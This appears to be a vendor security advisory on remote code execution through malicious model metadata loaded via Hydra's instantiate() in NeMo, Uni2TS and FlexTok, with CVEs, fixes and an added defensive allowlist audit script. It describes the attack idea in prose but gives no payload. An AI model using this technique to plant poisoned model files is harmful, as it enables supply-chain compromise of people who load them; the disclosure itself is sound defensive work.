Remote Code Execution With Modern AI/ML Formats and Libraries
Executive Summary:
We identified vulnerabilities in three open-source artificial intelligence/machine learning (AI/ML) Python libraries published by Apple, Salesforce, and NVIDIA on their GitHub repositories. Vulnerable versions of these libraries allow for remote code execution (RCE) when a model file with malicious metadata is loaded. These libraries are used in popular models on HuggingFace with tens of millions of downloads in total.
Vulnerable Libraries:
- NeMo (https://github.com/NVIDIA-NeMo/NeMo/tree/main): A PyTorch-based framework created by NVIDIA for research purposes, designed for developing diverse AI/ML models and complex systems.
- Uni2TS (https://github.com/SalesforceAIResearch/uni2ts): A PyTorch library created for research purposes and used by Salesforce's Moirai, a foundation model for time series analysis that forecasts trends from vast datasets.
- FlexTok (https://github.com/apple/ml-flextok): A Python-based framework created for research purposes by researchers at Apple and the Swiss Federal Institute of Technology’s Visual Intelligence and Learning Lab that enables AI/ML models to process images by handling the encoding and decoding functions.
Vulnerabilities:
The vulnerabilities stem from libraries using metadata to configure complex models and pipelines, where a shared third-party library instantiates classes using this metadata. Vulnerable versions of these libraries simply execute the provided data as code. This allows an attacker to embed arbitrary code in model metadata, which would automatically execute when vulnerable libraries load these modified models.
Mitigation and Protection:
As of December 2025, we have found no malicious examples using these vulnerabilities in the wild. Palo Alto Networks notified all affected vendors in April 2025 to ensure they had a chance to implement mitigations or resolve the issues before publication.
- NVIDIA: Issued CVE-2025-23304 (https://nvidia.custhelp.com/app/answers/detail/a_id/5686), rated High severity, and released a fix in NeMo version 2.3.2.
- FlexTok Researchers: Updated their code in June 2025 to resolve the issues.
- Salesforce: Issued CVE-2026-22584 (https://help.salesforce.com/s/articleView?id=005239354&type=1), rated High severity, and deployed a fix on July 31, 2025.
These vulnerabilities were discovered by Prisma AIRS (https://www.paloaltonetworks.com/prisma/prisma-ai-runtime-security), which is able to identify models leveraging these vulnerabilities and extract their payloads.
Palo Alto Networks customers are better protected from the threats discussed above through the following products and services:
- Cortex Cloud’s Vulnerability Management (https://www.paloaltonetworks.com/cortex/cloud/vulnerability-management): Identifies and manages base images for cloud virtual machine and containerized environments.
- Unit 42 AI Security Assessment (https://www.paloaltonetworks.com/resources/datasheets/unit-42-ai-security-assessment): Helps organizations reduce AI adoption risk, secure AI innovation, and strengthen AI governance.
Technical Analysis:
While newer formats have removed the ability to store model state and configurations as code, researchers still have use cases for serializing that information. Because these libraries are large and the configurations of their classes can be complex, many libraries use third-party tools to accomplish this.
Hydra:
Hydra (https://hydra.cc/) is a Python library maintained by Meta that is commonly used to serialize model state and configuration information. All the vulnerabilities we identified use the hydra.utils.instantiate() function, which is intended to "instantiate different implementations of an interface."
NeMo:
NVIDIA has been developing the NeMo library since 2019, as a "scalable and cloud-native generative AI framework." NeMo uses its own file formats with the .nemo and .qnemo file extensions, which are simply TAR files containing a model_config.yaml file that stores model metadata along with a .pt file or a .safetensors file, respectively.
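The Hydra and NeMo passages above describe metadata that names the class Hydra should instantiate. The following added example (not code from the advisory or from any of the affected projects) walks an already-parsed model configuration, such as the model_config.yaml extracted from a .nemo TAR and parsed with a YAML library, collects every Hydra `_target_` and reports the ones that fall outside an allowlist of module prefixes. The allowlist and the sample configuration are constructed assumptions for illustration.

```python
"""Audit Hydra-style instantiation targets found in model metadata."""
from __future__ import annotations

from typing import Any, Iterator

# Constructed allowlist: module prefixes that legitimately appear as
# instantiation targets in NeMo configurations. Tune it per framework.
ALLOWED_TARGET_PREFIXES = ("nemo.", "torch.", "omegaconf.")

# Hydra's documented key naming the callable that instantiate() will call.
HYDRA_TARGET_KEY = "_target_"


def iter_targets(node: Any, path: str = "") -> Iterator[tuple[str, str]]:
    """Yield (config_path, dotted_target) for every _target_ in the tree."""
    if isinstance(node, dict):
        target = node.get(HYDRA_TARGET_KEY)
        if isinstance(target, str):
            yield (path or "<root>", target)
        for key, value in node.items():
            yield from iter_targets(value, f"{path}.{key}" if path else str(key))
    elif isinstance(node, list):
        for idx, value in enumerate(node):
            yield from iter_targets(value, f"{path}[{idx}]")


def find_disallowed_targets(
    config: Any, allowed: tuple[str, ...] = ALLOWED_TARGET_PREFIXES
) -> list[tuple[str, str]]:
    """Return (config_path, target) pairs outside the allowlist, in order."""
    return [(p, t) for p, t in iter_targets(config) if not t.startswith(allowed)]


# Constructed sample resembling a parsed model_config.yaml: three expected
# targets plus one unreviewed third-party target nested three levels deep.
SAMPLE_CONFIG = {
    "model": {
        "encoder": {"_target_": "nemo.collections.asr.modules.ConformerEncoder", "d_model": 512},
        "tokenizer": {"_target_": "nemo.collections.common.tokenizers.SentencePieceTokenizer"},
        "callbacks": [
            {"_target_": "torch.nn.Identity"},
            {"extra": {"_target_": "thirdparty_unreviewed.hooks.Loader"}},
        ],
    },
}

if __name__ == "__main__":
    for config_path, target in find_disallowed_targets(SAMPLE_CONFIG):
        print(f"DISALLOWED {target} at {config_path}")
```

Run the audit before any code path that hands the parsed configuration to hydra.utils.instantiate(), and treat a non-empty result as a reason to refuse the model file.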
Uni2TS:
In 2024, Salesforce’s AI research team published an article titled "Unified Training of Universal Time Series Transformers" (https://arxiv.org/abs/2402.02592), which introduced a set of models that were published on HuggingFace (https://huggingface.co/collections/Salesforce/moirai-r-models-65c8d3a94c51428c300e0742). This research and the use of these models depend on uni2ts, an open-source Python library that accompanied the Salesforce article.
FlexTok:
Early in 2025, Apple and the Swiss Federal Institute of Technology’s Visual Intelligence and Learning Lab (EPFL VILAB) published research (https://arxiv.org/abs/2502.13967) that introduced a supporting Python library called ml-flextok. Like uni2ts, ml-flextok works exclusively with the safetensors format and extends PyTorchModelHubMixin.
Conclusion:
Palo Alto Networks has not identified any model files leveraging these vulnerabilities for attacks in the wild. However, there is ample opportunity for attackers to leverage them. It is common for developers to create their own variations of state-of-the-art models with different fine-tunings and quantizations, often from researchers unaffiliated with any reputable institution. Attackers would just need to create a modification of an existing popular model, with either a real or claimed benefit, and then add malicious metadata.
Additional Resources:
- Hydra documentation (https://hydra.cc/)
- NeMo source code (https://github.com/NVIDIA/NeMo/tree/main)
- uni2ts source code (https://github.com/SalesforceAIResearch/uni2ts)
- ml-flextok source code (https://github.com/apple/ml-flextok)
- Libraries of NeMo models (https://huggingface.co/models?library=nemo)